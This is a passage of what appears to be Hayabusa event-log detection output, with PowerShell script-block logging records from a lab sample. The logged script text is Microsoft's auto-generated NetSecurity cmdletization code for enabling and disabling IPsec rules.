(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] 
[ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ment.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) 
$__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } 
if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
